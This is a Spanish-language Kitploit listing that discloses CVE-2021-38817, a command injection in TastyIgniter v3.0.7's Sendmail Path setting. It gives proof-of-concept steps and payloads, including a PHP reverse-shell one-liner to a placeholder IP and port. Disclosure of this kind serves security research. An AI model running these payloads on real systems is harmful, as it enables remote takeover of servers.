Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-38817-Remote-OS-Command-Injection — Inyección remota de comandos del sistema operativo en el campo Sendmail Path de TastyIgniter v3.0.7 | Kitploit
Herramientas/GitHubGitHub/huskyhacks/cve-2021-38817-remote-os-command-injection
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHubhuskyhacks/cve-2021-38817-remote-os-command-injection

CVE-2021-38817-Remote-OS-Command-Injection

Inyección remota de comandos del sistema operativo en el campo Sendmail Path de TastyIgniter v3.0.7

Ver Repositorio
9241hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-38817-Inyección-remota-de-comandos-del-SO

Inyección remota de comandos del sistema operativo autenticada/Ejecución remota de código en la parte web Sendmail de TastyIgniter v3.0.7 (CVE-2021-38817)

Existe una vulnerabilidad de inyección remota de comandos del sistema operativo autenticada en el menú de configuración de Sendmail de TastyIgniter v3.0.7 Restaurtant CMS para la aplicación web. El parámetro Sendmail Path no se sanitiza correctamente, como lo indica el comando /usr/sbin/sendmail -bs poblado en el campo, y permite que se inyecte un comando arbitrario agregando un punto y coma y un comando adicional del sistema operativo.

Componentes afectados

URL: /admin/settings/edit/mail

Campo:

  • Protocolo de correo: Sendmail
  • Campo: Sendmail Path

POC

  • Autentíquese en el portal /admin con credenciales.
  • Navegue a /admin/settings/edit/mail
  • En el menú desplegable Mail Protocol, seleccione Sendmail
  • En el nuevo campo SendMail Path, agregue un punto y coma y un comando arbitrario del sistema operativo, p. ej. /usr/sbin/sendmail -bs; sleep 10
  • Payloads

    • /usr/sbin/sendmail -bs; sleep 10
    • /usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'

    TastyIgniterCVE

    Descubierto por

    Matt Kiely (HuskyHacks) y Mike Padrick (Fearless), agosto de 2021

    CVE asignado en octubre de 2022 (lmfao)

    Descargar herramienta